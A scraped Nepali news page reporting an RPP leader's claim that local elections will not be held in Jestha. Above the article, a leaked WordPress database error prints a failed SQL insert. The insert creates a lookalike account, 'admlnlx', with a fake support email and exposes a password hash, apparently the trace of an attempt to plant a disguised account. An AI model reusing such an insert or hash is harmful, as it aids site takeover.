WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEpMZ9JtZdAZAE.u.EJEg6/IdvFGJ31', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 18:48:24', '', 'admlnlx', 'admlnlx')

जेठमा स्थानीय चुनाव नहुने राप्रपा नेता राणाको दावि – Gaule Khabar

जेठमा स्थानीय चुनाव नहुने राप्रपा नेता राणाको दावि

जेठमा स्थानीय चुनाव नहुने राप्रपा नेता राणाको दावि

भक्तपुर, माघ २८ –  

राष्ट्रिय प्रजातन्त्र पार्टीका वरिष्ठ नेता पशुपति शमशेर जबराले वर्तमान सरकारले जेठमा स्थानीय निकायको निर्वाचन गर्न नसक्ने ठोकुवा गरेका छन्।

रफत सञ्चार क्लबले शुक्रबार भक्तपुरमा आयोजना गरेका साक्षात्कारमा बोल्दै नेता राणाले राप्रपा जेठमै चुनाव हुनुपर्ने पक्षमा रहे पनि सरकारले त्यो नचाहेको आरोप लगाए। एकातर्फ मधेसी मोर्चाको संविधान संशोधनको मागलाई एमालेले पारित हुन नदिने र अर्कोतर्फ सरकारले मधेसी मोर्चाको माग सम्बोधन गर्ने प्रतिबद्धता जनाउनुले कतैबाट पनि निर्वाचन सम्भव नदेखिने राणाको विश्लेषण छ। मोर्चालाई बाइपास गरेर चुनाव सम्भव नहुने र चुनाव नभए मुलुक संवैधानिक संकटमा फस्ने भन्दै उनले ठूला दलहरु जिम्मेवार बनेर समस्या समाधानमा केन्द्रित हुनुपर्नेमा जोड दिए।

साथै राणाले राप्रपा सरकारबाट बाहिरिन खोजेको भन्ने हल्लाको खण्डन समेत गरे। पार्टीले सरकारबाट फिर्ता हुने निर्णय नगरेको भन्दै उनले कुन नेताले कहाँ गएर के बोल्छ भन्ने कुरा प्रधान नभएको बताए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका